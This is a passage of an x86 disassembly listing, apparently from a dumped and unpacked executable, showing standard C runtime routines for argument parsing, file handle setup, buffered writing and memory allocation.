mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41A3F4
and dword ptr [eax], 0
loc_41A3F4: ; CODE XREF: sub_41A28E+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_41A28E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3FA proc near ; CODE XREF: .text:00414A44�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_47B674, edi
jnz short loc_41A411
call sub_4195AD
loc_41A411: ; CODE XREF: sub_41A3FA+10�j
and byte_47A134, 0
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
call ds:dword_41F010
mov eax, dword_47B664
cmp eax, edi
mov off_479E8C, esi
jz short loc_41A440
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_41A442
loc_41A440: ; CODE XREF: sub_41A3FA+3D�j
mov ebx, esi
loc_41A442: ; CODE XREF: sub_41A3FA+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_41A28E
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_41344D
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_41A472
or eax, 0FFFFFFFFh
jmp short loc_41A497
; ---------------------------------------------------------------------------
loc_41A472: ; CODE XREF: sub_41A3FA+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_41A28E
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_479E70, eax
pop ecx
mov dword_479E74, edi
xor eax, eax
loc_41A497: ; CODE XREF: sub_41A3FA+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A3FA endp
; =============== S U B R O U T I N E =======================================
sub_41A49C proc near ; CODE XREF: .text:00414A3A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_47A138
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41F1A4
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_41A4E5
call edi
mov esi, eax
cmp esi, ebx
jz short loc_41A4CC
mov dword_47A138, 1
jmp short loc_41A4EA
; ---------------------------------------------------------------------------
loc_41A4CC: ; CODE XREF: sub_41A49C+22�j
call ds:dword_41F008
cmp eax, 78h
jnz short loc_41A4E0
mov eax, ebp
mov dword_47A138, eax
jmp short loc_41A4E5
; ---------------------------------------------------------------------------
loc_41A4E0: ; CODE XREF: sub_41A49C+39�j
mov eax, dword_47A138
loc_41A4E5: ; CODE XREF: sub_41A49C+1A�j
; sub_41A49C+42�j
cmp eax, 1
jnz short loc_41A567
loc_41A4EA: ; CODE XREF: sub_41A49C+2E�j
cmp esi, ebx
jnz short loc_41A4F6
call edi
mov esi, eax
cmp esi, ebx
jz short loc_41A56F
loc_41A4F6: ; CODE XREF: sub_41A49C+50�j
cmp [esi], bx
mov eax, esi
jz short loc_41A50B
loc_41A4FD: ; CODE XREF: sub_41A49C+66�j
; sub_41A49C+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_41A4FD
add eax, ebp
cmp [eax], bx
jnz short loc_41A4FD
loc_41A50B: ; CODE XREF: sub_41A49C+5F�j
mov edi, ds:dword_41F0AC
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi
mov ebp, eax
cmp ebp, ebx
jz short loc_41A55C
push ebp
call sub_41344D
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41A55C
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi
test eax, eax
jnz short loc_41A558
push [esp+18h+var_8]
call sub_412FE4
pop ecx
mov [esp+18h+var_8], ebx
loc_41A558: ; CODE XREF: sub_41A49C+AC�j
mov ebx, [esp+18h+var_8]
loc_41A55C: ; CODE XREF: sub_41A49C+8C�j
; sub_41A49C+9B�j
push esi
call ds:dword_41F1A0
mov eax, ebx
jmp short loc_41A5B7
; ---------------------------------------------------------------------------
loc_41A567: ; CODE XREF: sub_41A49C+4C�j
cmp eax, ebp
jz short loc_41A573
cmp eax, ebx
jz short loc_41A573
loc_41A56F: ; CODE XREF: sub_41A49C+58�j
; sub_41A49C+E1�j
xor eax, eax
jmp short loc_41A5B7
; ---------------------------------------------------------------------------
loc_41A573: ; CODE XREF: sub_41A49C+CD�j
; sub_41A49C+D1�j
call ds:dword_41F19C
mov esi, eax
cmp esi, ebx
jz short loc_41A56F
cmp [esi], bl
jz short loc_41A58D
loc_41A583: ; CODE XREF: sub_41A49C+EA�j
; sub_41A49C+EF�j
inc eax
cmp [eax], bl
jnz short loc_41A583
inc eax
cmp [eax], bl
jnz short loc_41A583
loc_41A58D: ; CODE XREF: sub_41A49C+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_41344D
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_41A5A3
xor edi, edi
jmp short loc_41A5AE
; ---------------------------------------------------------------------------
loc_41A5A3: ; CODE XREF: sub_41A49C+101�j
push ebp
push esi
push edi
call sub_4177B0
add esp, 0Ch
loc_41A5AE: ; CODE XREF: sub_41A49C+105�j
push esi
call ds:dword_41F198
mov eax, edi
loc_41A5B7: ; CODE XREF: sub_41A49C+C9�j
; sub_41A49C+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41A49C endp
; =============== S U B R O U T I N E =======================================
sub_41A5BE proc near ; CODE XREF: .text:00414A1E�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 48h
push ebx
mov ebx, 480h
push ebx
call sub_41344D
test eax, eax
pop ecx
jnz short loc_41A5DA
or eax, 0FFFFFFFFh
jmp loc_41A7B7
; ---------------------------------------------------------------------------
loc_41A5DA: ; CODE XREF: sub_41A5BE+12�j
mov dword_47A2E0, eax
mov dword_47A2C8, 20h
lea ecx, [eax+480h]
jmp short loc_41A60F
; ---------------------------------------------------------------------------
loc_41A5F1: ; CODE XREF: sub_41A5BE+53�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_47A2E0
add eax, 24h
add ecx, 480h
loc_41A60F: ; CODE XREF: sub_41A5BE+31�j
cmp eax, ecx
jb short loc_41A5F1
push ebp
push esi
push edi
lea eax, [esp+58h+var_44]
push eax
call ds:dword_41F148
cmp word ptr [esp+58h+var_14+2], 0
jz loc_41A716
mov eax, [esp+58h+var_10]
test eax, eax
jz loc_41A716
mov edi, [eax]
lea ebp, [eax+4]
lea eax, [edi+ebp]
mov [esp+58h+var_48], eax
mov eax, 800h
cmp edi, eax
jl short loc_41A650
mov edi, eax
loc_41A650: ; CODE XREF: sub_41A5BE+8E�j
cmp dword_47A2C8, edi
jge short loc_41A6A6
mov esi, offset dword_47A2E4
loc_41A65D: ; CODE XREF: sub_41A5BE+DE�j
push ebx
call sub_41344D
test eax, eax
pop ecx
jz short loc_41A6A0
add dword_47A2C8, 20h
mov [esi], eax
lea ecx, [eax+480h]
jmp short loc_41A68F
; ---------------------------------------------------------------------------
loc_41A679: ; CODE XREF: sub_41A5BE+D3�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, ebx
loc_41A68F: ; CODE XREF: sub_41A5BE+B9�j
cmp eax, ecx
jb short loc_41A679
add esi, 4
cmp dword_47A2C8, edi
jl short loc_41A65D
jmp short loc_41A6A6
; ---------------------------------------------------------------------------
loc_41A6A0: ; CODE XREF: sub_41A5BE+A8�j
mov edi, dword_47A2C8
loc_41A6A6: ; CODE XREF: sub_41A5BE+98�j
; sub_41A5BE+E0�j
xor ebx, ebx
test edi, edi
jle short loc_41A716
loc_41A6AC: ; CODE XREF: sub_41A5BE+156�j
mov eax, [esp+58h+var_48]
mov eax, [eax]
cmp eax, 0FFFFFFFFh
jz short loc_41A70B
mov cl, [ebp+0]
test cl, 1
jz short loc_41A70B
test cl, 8
jnz short loc_41A6CF
push eax
call ds:dword_41F1AC
test eax, eax
jz short loc_41A70B
loc_41A6CF: ; CODE XREF: sub_41A5BE+104�j
mov ecx, ebx
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea esi, [ecx+eax*4]
mov eax, [esp+58h+var_48]
mov eax, [eax]
mov [esi], eax
mov al, [ebp+0]
mov [esi+4], al
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41A736
inc dword ptr [esi+8]
loc_41A70B: ; CODE XREF: sub_41A5BE+F7�j
; sub_41A5BE+FF�j ...
add [esp+58h+var_48], 4
inc ebx
inc ebp
cmp ebx, edi
jl short loc_41A6AC
loc_41A716: ; CODE XREF: sub_41A5BE+69�j
; sub_41A5BE+75�j ...
xor ebx, ebx
loc_41A718: ; CODE XREF: sub_41A5BE+1E2�j
mov ecx, dword_47A2E0
lea eax, [ebx+ebx*8]
lea esi, [ecx+eax*4]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_41A798
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41A73B
push 0FFFFFFF6h
pop eax
jmp short loc_41A745
; ---------------------------------------------------------------------------
loc_41A736: ; CODE XREF: sub_41A5BE+148�j
; sub_41A5BE+1CD�j
or eax, 0FFFFFFFFh
jmp short loc_41A7B4
; ---------------------------------------------------------------------------
loc_41A73B: ; CODE XREF: sub_41A5BE+171�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41A745: ; CODE XREF: sub_41A5BE+176�j
push eax
call ds:dword_41F190
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41A792
push edi
call ds:dword_41F1AC
test eax, eax
jz short loc_41A792
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_41A770
or byte ptr [esi+4], 40h
jmp short loc_41A779
; ---------------------------------------------------------------------------
loc_41A770: ; CODE XREF: sub_41A5BE+1AA�j
cmp eax, 3
jnz short loc_41A779
or byte ptr [esi+4], 8
loc_41A779: ; CODE XREF: sub_41A5BE+1B0�j
; sub_41A5BE+1B5�j
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41A736
inc dword ptr [esi+8]
jmp short loc_41A79C
; ---------------------------------------------------------------------------
loc_41A792: ; CODE XREF: sub_41A5BE+193�j
; sub_41A5BE+19E�j
or byte ptr [esi+4], 40h
jmp short loc_41A79C
; ---------------------------------------------------------------------------
loc_41A798: ; CODE XREF: sub_41A5BE+169�j
or byte ptr [esi+4], 80h
loc_41A79C: ; CODE XREF: sub_41A5BE+1D2�j
; sub_41A5BE+1D8�j
inc ebx
cmp ebx, 3
jl loc_41A718
push dword_47A2C8
call ds:dword_41F1A8
xor eax, eax
loc_41A7B4: ; CODE XREF: sub_41A5BE+17B�j
pop edi
pop esi
pop ebp
loc_41A7B7: ; CODE XREF: sub_41A5BE+17�j
pop ebx
add esp, 48h
retn
sub_41A5BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7BC proc near ; CODE XREF: sub_41A961+52�p
; sub_41D96E+91�p
var_420 = byte ptr -420h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, dword_42CE38
xor eax, [ebp+4]
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+var_14], edi
mov [ebp+var_18], edi
jnz short loc_41A7E5
xor eax, eax
jmp loc_41A953
; ---------------------------------------------------------------------------
loc_41A7E5: ; CODE XREF: sub_41A7BC+20�j
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_0]
and eax, 1Fh
sar ebx, 5
push esi
lea esi, [eax+eax*8]
lea ebx, ds:47A2E0h[ebx*4]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_41A818
push 2
push edi
push edi
push [ebp+arg_0]
call sub_41D896
add esp, 10h
loc_41A818: ; CODE XREF: sub_41A7BC+4B�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41A8EA
cmp [ebp+arg_8], edi
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov [ebp+var_8], edi
jbe loc_41A925
loc_41A838: ; CODE XREF: sub_41A7BC+F3�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+arg_4]
lea eax, [ebp+var_420]
mov [ebp+var_C], edi
loc_41A847: ; CODE XREF: sub_41A7BC+B5�j
cmp ecx, [ebp+arg_8]
jnb short loc_41A873
mov edx, [ebp+var_10]
inc [ebp+var_10]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_41A864
inc [ebp+var_18]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+var_C]
loc_41A864: ; CODE XREF: sub_41A7BC+9C�j
mov [eax], dl
inc eax
inc [ebp+var_C]
cmp [ebp+var_C], 400h
jl short loc_41A847
loc_41A873: ; CODE XREF: sub_41A7BC+8E�j
mov edi, eax
lea eax, [ebp+var_420]
sub edi, eax
push 0
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_420]
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_41F038
test eax, eax
jz short loc_41A8B3
mov eax, [ebp+var_1C]
add [ebp+var_14], eax
cmp eax, edi
jl short loc_41A8BC
mov eax, [ebp+var_10]
sub eax, [ebp+arg_4]
xor edi, edi
cmp eax, [ebp+arg_8]
jb short loc_41A838
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A8B3: ; CODE XREF: sub_41A7BC+DC�j
call ds:dword_41F008
mov [ebp+var_8], eax
loc_41A8BC: ; CODE XREF: sub_41A7BC+E6�j
xor edi, edi
loc_41A8BE: ; CODE XREF: sub_41A7BC+F5�j
; sub_41A7BC+14E�j ...
mov eax, [ebp+var_14]
cmp eax, edi
jnz loc_41A94E
cmp [ebp+var_8], edi
jz short loc_41A925
push 5
pop esi
cmp [ebp+var_8], esi
jnz short loc_41A917
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
mov [eax], esi
jmp short loc_41A920
; ---------------------------------------------------------------------------
loc_41A8EA: ; CODE XREF: sub_41A7BC+64�j
push edi
lea ecx, [ebp+var_1C]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_41F038
test eax, eax
jz short loc_41A90C
mov eax, [ebp+var_1C]
mov [ebp+var_8], edi
mov [ebp+var_14], eax
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A90C: ; CODE XREF: sub_41A7BC+143�j
call ds:dword_41F008
mov [ebp+var_8], eax
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
loc_41A917: ; CODE XREF: sub_41A7BC+118�j
push [ebp+var_8]
call sub_417C82
pop ecx
loc_41A920: ; CODE XREF: sub_41A7BC+12C�j
; sub_41A7BC+190�j
or eax, 0FFFFFFFFh
jmp short loc_41A951
; ---------------------------------------------------------------------------
loc_41A925: ; CODE XREF: sub_41A7BC+76�j
; sub_41A7BC+110�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41A93A
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jnz short loc_41A93A
xor eax, eax
jmp short loc_41A951
; ---------------------------------------------------------------------------
loc_41A93A: ; CODE XREF: sub_41A7BC+170�j
; sub_41A7BC+178�j
call sub_417C70
mov dword ptr [eax], 1Ch
call sub_417C79
mov [eax], edi
jmp short loc_41A920
; ---------------------------------------------------------------------------
loc_41A94E: ; CODE XREF: sub_41A7BC+107�j
sub eax, [ebp+var_18]
loc_41A951: ; CODE XREF: sub_41A7BC+167�j
; sub_41A7BC+17C�j
pop esi
pop ebx
loc_41A953: ; CODE XREF: sub_41A7BC+24�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
call sub_4182D6
leave
retn
sub_41A7BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A961 proc near ; CODE XREF: sub_414AFC+98�p
; sub_414AFC+EB�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041A9F0 SIZE 0000001C BYTES
push 0Ch
push offset stru_4283E8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_41A9F0
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41A9F0
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41A9C0
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41A7BC
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41A9D7
; ---------------------------------------------------------------------------
loc_41A9C0: ; CODE XREF: sub_41A961+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41A9D7: ; CODE XREF: sub_41A961+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A9E8
mov eax, [ebp+var_1C]
jmp short loc_41AA06
sub_41A961 endp
; =============== S U B R O U T I N E =======================================
sub_41A9E5 proc near ; DATA XREF: .rdata:stru_4283E8�o
mov ebx, [ebp+8]
sub_41A9E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A9E8 proc near ; CODE XREF: sub_41A961+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_41A9E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A961
loc_41A9F0: ; CODE XREF: sub_41A961+15�j
; sub_41A961+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41AA06: ; CODE XREF: sub_41A961+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41A961
; =============== S U B R O U T I N E =======================================
sub_41AA0C proc near ; CODE XREF: sub_414AFC+6F�p
; sub_417455+34�p ...
arg_0 = dword ptr 4
inc dword_479EB8
push 1000h
call sub_41344D
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_41AA35
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41AA46
; ---------------------------------------------------------------------------
loc_41AA35: ; CODE XREF: sub_41AA0C+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41AA46: ; CODE XREF: sub_41AA0C+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41AA0C endp
; =============== S U B R O U T I N E =======================================
sub_41AA50 proc near ; CODE XREF: sub_414AFC+64�p
; sub_418FBC+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47A2C8
jb short loc_41AA5F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41AA5F: ; CODE XREF: sub_41AA50+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea eax, [eax+eax*8]
movsx eax, byte ptr [ecx+eax*4+4]
and eax, 40h
retn
sub_41AA50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA7A proc near ; CODE XREF: sub_41AADA+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_41AA8B
xor eax, eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AA8B: ; CODE XREF: sub_41AA7A+B�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_41AAA4
mov ax, [ebp+arg_8]
cmp ax, 0FFh
ja short loc_41AAC9
mov [ecx], al
xor eax, eax
inc eax
jmp short loc_41AAD7
; ---------------------------------------------------------------------------
loc_41AAA4: ; CODE XREF: sub_41AA7A+17�j
lea edx, [ebp+arg_4]
push edx
push esi
push dword ptr [eax+28h]
mov [ebp+arg_4], esi
push ecx
push 1
lea ecx, [ebp+arg_8]
push ecx
push esi
push dword ptr [eax+4]
call ds:dword_41F0AC
cmp eax, esi
jz short loc_41AAC9
cmp [ebp+arg_4], esi
jz short loc_41AAD7
loc_41AAC9: ; CODE XREF: sub_41AA7A+21�j
; sub_41AA7A+48�j
call sub_417C70
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_41AAD7: ; CODE XREF: sub_41AA7A+F�j
; sub_41AA7A+28�j ...
pop esi
pop ebp
retn
sub_41AA7A endp
; =============== S U B R O U T I N E =======================================
sub_41AADA proc near ; CODE XREF: sub_414CA3+317�p
; sub_414CA3+6F7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AAEF
call sub_41628E
loc_41AAEF: ; CODE XREF: sub_41AADA+E�j
push [esp+arg_4]
push [esp+4+arg_0]
push eax
call sub_41AA7A
add esp, 0Ch
retn
sub_41AADA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB01 proc near ; CODE XREF: sub_415456+23�p
; sub_4154C7+29�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041ABB4 SIZE 00000008 BYTES
push 10h
push offset stru_4283F8
call __SEH_prolog
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+var_1C], esi
test esi, esi
jnz short loc_41AB1C
inc esi
loc_41AB1C: ; CODE XREF: sub_41AB01+18�j
; sub_41AB01+9F�j
xor edi, edi
mov [ebp+var_20], edi
cmp esi, 0FFFFFFE0h
ja short loc_41AB8B
cmp dword_47A640, 3
jnz short loc_41AB76
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov ebx, [ebp+var_1C]
cmp ebx, dword_47A62C
ja short loc_41AB76
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], edi
push ebx
call sub_417159
pop ecx
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41ABAB
mov edi, [ebp+var_20]
test edi, edi
jz short loc_41AB7A
push [ebp+var_1C]
push 0
push edi
call sub_41ADD0
add esp, 0Ch
loc_41AB76: ; CODE XREF: sub_41AB01+2C�j
; sub_41AB01+40�j
test edi, edi
jnz short loc_41ABB4
loc_41AB7A: ; CODE XREF: sub_41AB01+65�j
push esi
push 8
push dword_47A63C
call ds:dword_41F13C
mov edi, eax
loc_41AB8B: ; CODE XREF: sub_41AB01+23�j
test edi, edi
jnz short loc_41ABB4
cmp dword_47A014, edi
jz short loc_41ABB4
push esi
call sub_417AED
pop ecx
test eax, eax
jnz loc_41AB1C
jmp short loc_41ABB6
sub_41AB01 endp
; =============== S U B R O U T I N E =======================================
sub_41ABA8 proc near ; DATA XREF: .rdata:stru_4283F8�o
mov esi, [ebp+0Ch]
sub_41ABA8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41ABAB proc near ; CODE XREF: sub_41AB01+5B�p
push 4
call sub_41686D
pop ecx
retn
sub_41ABAB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41AB01
loc_41ABB4: ; CODE XREF: sub_41AB01+77�j
; sub_41AB01+8C�j ...
mov eax, edi
loc_41ABB6: ; CODE XREF: sub_41AB01+A5�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41AB01
; =============== S U B R O U T I N E =======================================
sub_41ABBC proc near ; CODE XREF: sub_41554C+CF�p
; sub_41554C+301�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41ABD1
call sub_41628E
loc_41ABD1: ; CODE XREF: sub_41ABBC+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41ABE7
push 4
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41ABE7: ; CODE XREF: sub_41ABBC+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41ABBC endp
; =============== S U B R O U T I N E =======================================
sub_41ABF6 proc near ; CODE XREF: sub_41554C+840�p
; sub_41554C+922�p
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AC0B
call sub_41628E
loc_41AC0B: ; CODE XREF: sub_41ABF6+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41AC24
push 80h
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41AC24: ; CODE XREF: sub_41ABF6+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41ABF6 endp
; =============== S U B R O U T I N E =======================================
sub_41AC35 proc near ; CODE XREF: sub_41554C+3F�p
; sub_41554C+5A�p ...
arg_0 = dword ptr 4
call sub_415456
mov eax, [eax+64h]
cmp eax, off_42C7BC
jz short loc_41AC4A
call sub_41628E
loc_41AC4A: ; CODE XREF: sub_41AC35+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41AC60
push 8
push [esp+4+arg_0]
push eax
call sub_41608B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41AC60: ; CODE XREF: sub_41AC35+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41AC35 endp
; =============== S U B R O U T I N E =======================================
sub_41AC6F proc near ; CODE XREF: sub_41554C+6D�p
; sub_41554C+3DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_41ACBB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_41AC8D
test al, al
jns short loc_41ACBB
test al, 2
jnz short loc_41ACBB
loc_41AC8D: ; CODE XREF: sub_41AC6F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_41AC9A
push esi
call sub_41AA0C
pop ecx
loc_41AC9A: ; CODE XREF: sub_41AC6F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_41ACAA
cmp dword ptr [esi+4], 0
jnz short loc_41ACBB
inc eax
mov [esi], eax
loc_41ACAA: ; CODE XREF: sub_41AC6F+30�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_41ACC1
cmp [eax], bl
jz short loc_41ACC3
inc eax
mov [esi], eax
loc_41ACBB: ; CODE XREF: sub_41AC6F+9�j
; sub_41AC6F+18�j ...
or eax, 0FFFFFFFFh
loc_41ACBE: ; CODE XREF: sub_41AC6F+6A�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41ACC1: ; CODE XREF: sub_41AC6F+43�j
mov [eax], bl
loc_41ACC3: ; CODE XREF: sub_41AC6F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_41ACBE
sub_41AC6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACDB proc near ; CODE XREF: sub_41AD9B+22�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_41ACFF
cmp [ebp+arg_C], ebx
jz short loc_41ACFF
mov al, [edi]
cmp al, bl
jnz short loc_41AD06
mov eax, [ebp+arg_4]
cmp eax, ebx
jz short loc_41ACFF
mov [eax], bx
loc_41ACFF: ; CODE XREF: sub_41ACDB+D�j
; sub_41ACDB+12�j ...
xor eax, eax
loc_41AD01: ; CODE XREF: sub_41ACDB+44�j
; sub_41ACDB+8D�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AD06: ; CODE XREF: sub_41ACDB+18�j
mov esi, [ebp+arg_0]
cmp [esi+14h], ebx
jnz short loc_41AD21
mov ecx, [ebp+arg_4]
